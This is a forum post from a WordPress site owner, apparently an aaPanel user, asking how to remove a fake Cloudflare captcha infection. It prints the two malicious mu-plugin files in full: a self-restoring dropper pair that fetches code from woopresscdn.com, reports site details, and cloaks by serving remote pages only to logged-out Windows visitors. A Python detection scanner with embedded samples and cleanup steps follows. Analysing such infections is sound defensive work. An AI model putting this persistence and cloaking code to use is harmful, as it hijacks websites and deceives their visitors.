aaPanel_Kern
This screen is being generated by two files created in a mu-plugins folder within wp-content (I use WordPress on my websites). Here's the code for each file:
wp-cache-manager.php

```php
<?php
if (!defined("ABSPATH")) exit;
// Watchdog: if the second file is missing, download it again from the remote panel.
$target = WPMU_PLUGIN_DIR . "/wp-content-sanitizer.php";
if (!file_exists($target)) {
    $src = @file_get_contents("https://woopresscdn.com/api/plugin");
    if ($src && strlen($src) > 100) @file_put_contents($target, $src);
}
```
wp-content-sanitizer.php

```php
<?php
if (!defined('ABSPATH')) exit;
define('WPCS_PANEL', 'https://woopresscdn.com');
define('WPCS_SELF', __FILE__);
define('WPCS_WATCHDOG', WPMU_PLUGIN_DIR . '/wp-cache-manager.php');

add_action('init', function() {
    // Persistence: rewrite the watchdog file on every request if it has been deleted,
    // so each file restores the other.
    if (!file_exists(WPCS_WATCHDOG)) {
        $code = '<?php' . "\n" . 'if (!defined("ABSPATH")) exit;' . "\n";
        $code .= '$target = WPMU_PLUGIN_DIR . "/wp-content-sanitizer.php";' . "\n";
        $code .= 'if (!file_exists($target)) {' . "\n";
        $code .= ' $src = @file_get_contents("' . WPCS_PANEL . '/api/plugin");' . "\n";
        $code .= ' if ($src && strlen($src) > 100) @file_put_contents($target, $src);' . "\n";
        $code .= '}' . "\n";
        @file_put_contents(WPCS_WATCHDOG, $code);
    }

    // Hourly heartbeat: reports the domain, site URL and WordPress version to the panel.
    $last = get_option('wpcs_hb', 0);
    if (time() - $last > 3600) {
        wp_remote_post(WPCS_PANEL . '/api/heartbeat', [
            'timeout' => 10,
            'blocking' => false,
            'body' => json_encode([
                'domain' => $_SERVER['HTTP_HOST'] ?? parse_url(home_url(), PHP_URL_HOST),
                'status' => 'active',
                'site_url' => home_url(),
                'wp_version' => get_bloginfo('version')
            ]),
            'headers' => ['Content-Type' => 'application/json']
        ]);
        update_option('wpcs_hb', time());

        // Self-update: if the panel announces a new URL, overwrite this file with code
        // fetched from it and delete the watchdog so it is regenerated for the new panel.
        $update_resp = wp_remote_get(WPCS_PANEL . '/api/check_update', ['timeout' => 10]);
        if (!is_wp_error($update_resp)) {
            $update_body = json_decode(wp_remote_retrieve_body($update_resp), true);
            if (!empty($update_body['panel_url']) && rtrim($update_body['panel_url'], '/') !== rtrim(WPCS_PANEL, '/')) {
                $new_panel = rtrim($update_body['panel_url'], '/');
                $new_code = @file_get_contents($new_panel . '/api/plugin');
                if ($new_code && strlen($new_code) > 100) {
                    @file_put_contents(WPCS_SELF, $new_code);
                    if (file_exists(WPCS_WATCHDOG)) {
                        @unlink(WPCS_WATCHDOG);
                    }
                }
            }
        }
    }
});

// Cloaked page replacement, run at priority 1 so it fires before the theme renders.
add_action('template_redirect', function() {
    // Never fire in admin, AJAX, feeds, robots.txt, trackbacks or REST requests.
    if (is_admin() || wp_doing_ajax() || is_feed() || is_robots() ||
        is_trackback() || (defined('REST_REQUEST') && REST_REQUEST)) {
        return;
    }
    // Never fire for logged-in users who can edit posts (site owners do not see it).
    if (is_user_logged_in() && current_user_can('edit_posts')) {
        return;
    }
    // Only Windows desktop browsers; skip crawlers, link previewers and performance tools.
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (strpos($ua, 'Windows') === false) return;
    $bots = ['bot', 'crawl', 'spider', 'slurp', 'facebook', 'twitter', 'discord', 'telegram', 'whatsapp', 'lighthouse', 'pingdom', 'gtmetrix'];
    foreach ($bots as $b) {
        if (stripos($ua, $b) !== false) return;
    }
    $mobile = ['Android', 'iPhone', 'iPad', 'iPod', 'webOS', 'BlackBerry', 'IEMobile', 'Opera Mini'];
    foreach ($mobile as $m) {
        if (stripos($ua, $m) !== false) return;
    }
    // Fetch per-domain HTML from the panel and serve it instead of the real page.
    $domain = $_SERVER['HTTP_HOST'] ?? '';
    $response = wp_remote_get(WPCS_PANEL . '/api/inject?domain=' . urlencode($domain), ['timeout' => 15]);
    if (is_wp_error($response)) return;
    $html = wp_remote_retrieve_body($response);
    if (empty($html)) return;
    while (ob_get_level()) {
        ob_end_clean();
    }
    header('HTTP/1.1 200 OK');
    header('Content-Type: text/html; charset=UTF-8');
    header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
    header('Pragma: no-cache');
    header('Expires: Thu, 01 Jan 1970 00:00:00 GMT');
    echo $html;
    exit;
}, 1);
```
As soon as I delete these two files, the fake Cloudflare captcha verification screen disappears. However, this file and the mu-plugins folder are automatically recreated shortly after.
There's some injected code, but I can't find where. I've run everything in aaPanel to scan the code, and plugins like Wordfence or Sucuri, and none of them find anything malicious. What could it be?
I've already changed the passwords for the panel, SSH, the administrator login for each WordPress site, and the database password, but nothing.
I searched some tables to see if I could find any strange code in the database, but nothing. Has anyone experienced something similar and can share how they solved it?
All plugins and WordPress versions are up to date; no plugins or themes have been installed externally in a nulled manner (plugins are from the WordPress repository itself, and the theme is Elementor's Hello).
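The two files above restore each other: the sanitizer rewrites the watchdog on every `init`, and the watchdog re-downloads the sanitizer, so removing only one never works, and since they come back even after both are deleted, something outside `mu-plugins` is dropping them again. The scanner below is an added example (not code from the post, aaPanel or WordPress) that walks a WordPress tree and scores every PHP file on the traits those files show: the `woopresscdn.com` panel host and `mu-plugins` paths come from the posted code, while the indicator weights and the `THRESHOLD` are my own choices. The watchdog file is embedded as sample input together with a constructed cloaker and a constructed benign mu-plugin.

```python
#!/usr/bin/env python3
"""Static scanner for self-restoring mu-plugin droppers and page hijackers.

Added example, not from the post, aaPanel or WordPress. Host and paths come
from the posted files; weights and THRESHOLD are assumptions to tune.
"""
import re
import sys
from pathlib import Path

KNOWN_PANEL_HOSTS = ("woopresscdn.com",)  # from the post; add others you find
THRESHOLD = 8                             # assumption: score at which a file is flagged


def has(pattern):
    """Return a predicate that is true when the regex matches the file text."""
    rx = re.compile(pattern)
    return lambda text: rx.search(text) is not None


def overwrites_itself(text):
    """file_put_contents() whose target is __FILE__ or a constant defined as __FILE__."""
    names = ["__FILE__"] + re.findall(r"define\s*\(\s*['\"](\w+)['\"]\s*,\s*__FILE__", text)
    rx = r"file_put_contents\s*\(\s*(?:%s)\b" % "|".join(map(re.escape, names))
    return re.search(rx, text) is not None


fetch_fn = has(r"(?:file_get_contents|wp_remote_get|wp_remote_post)\s*\(")
write_fn = has(r"file_put_contents\s*\(")
remote_url = has(r"https?://[\w.-]+")

# (indicator, predicate, weight): each trait mirrors something the posted files do.
INDICATORS = [
    ("known_panel_host", has("|".join(map(re.escape, KNOWN_PANEL_HOSTS))), 10),
    ("builds_mu_plugin_path", has(r"WPMU_PLUGIN_DIR\s*\.\s*['\"]/[^'\"]+\.php['\"]"), 3),
    ("writes_code_fetched_remotely", lambda t: fetch_fn(t) and remote_url(t) and write_fn(t), 5),
    ("overwrites_itself", overwrites_itself, 4),
    ("hijacks_output_buffer",
     lambda t: has(r"ob_end_clean\s*\(")(t) and has(r"echo\s+\$\w+\s*;\s*exit\s*;")(t), 4),
    ("user_agent_cloaking",
     lambda t: has(r"HTTP_USER_AGENT")(t) and has(r"['\"](?:bot|crawl|spider)['\"]")(t), 2),
    ("error_suppressed_file_io", has(r"@(?:file_put_contents|file_get_contents|unlink)\s*\("), 2),
    ("recreates_sibling_file", lambda t: has(r"!\s*file_exists\s*\(")(t) and write_fn(t), 2),
]


def scan_source(source):
    """Score one PHP source text; returns matched indicators and a verdict."""
    hits = [(name, weight) for name, check, weight in INDICATORS if check(source)]
    score = sum(w for _, w in hits)
    return {"score": score, "indicators": [n for n, _ in hits], "suspicious": score >= THRESHOLD}


def scan_tree(root):
    """Scan every .php file under root (wp-config.php, themes, plugins, uploads included)."""
    results = []
    for path in sorted(Path(root).rglob("*.php")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        result = scan_source(text)
        if result["indicators"]:
            result["path"] = str(path)
            results.append(result)
    return sorted(results, key=lambda r: -r["score"])


# Sample input: the watchdog file from the post, verbatim.
DROPPER_SAMPLE = r'''<?php
if (!defined("ABSPATH")) exit;
$target = WPMU_PLUGIN_DIR . "/wp-content-sanitizer.php";
if (!file_exists($target)) {
    $src = @file_get_contents("https://woopresscdn.com/api/plugin");
    if ($src && strlen($src) > 100) @file_put_contents($target, $src);
}
'''

# Sample input: constructed condensation of the template_redirect hijack.
CLOAKER_SAMPLE = r'''<?php
add_action('template_redirect', function() {
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (stripos($ua, 'bot') !== false) return;
    $response = wp_remote_get('https://woopresscdn.com/api/inject', ['timeout' => 15]);
    if (is_wp_error($response)) return;
    $html = wp_remote_retrieve_body($response);
    while (ob_get_level()) { ob_end_clean(); }
    echo $html;
    exit;
}, 1);
'''

# Sample input: constructed benign mu-plugin that only turns on plugin auto-updates.
BENIGN_SAMPLE = r'''<?php
if (!defined('ABSPATH')) exit;
add_filter('auto_update_plugin', '__return_true');
'''


def demo():
    """Verdicts for the three embedded samples (dropper, cloaker, benign)."""
    return tuple(scan_source(s)["suspicious"] for s in (DROPPER_SAMPLE, CLOAKER_SAMPLE, BENIGN_SAMPLE))


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python3 scan.py /www/wwwroot/example.com
        for r in scan_tree(sys.argv[1]):
            flag = "SUSPICIOUS" if r["suspicious"] else "info"
            print(f"{flag:10} {r['score']:3} {r['path']}  {', '.join(r['indicators'])}")
    else:
        print("dropper, cloaker, benign suspicious:", demo())
```

Run it against the whole site root rather than only `wp-content/mu-plugins`, because the file that keeps recreating the pair may sit in `wp-config.php`, a theme's `functions.php`, another plugin, or `uploads`. A file scanner cannot see scheduled execution, so also inspect the WP-Cron `cron` row in `wp_options` for unknown hooks, the system crontab for the web user, and aaPanel's scheduled tasks, and remove both files in a single step while the site is offline so neither has a request in which to restore the other.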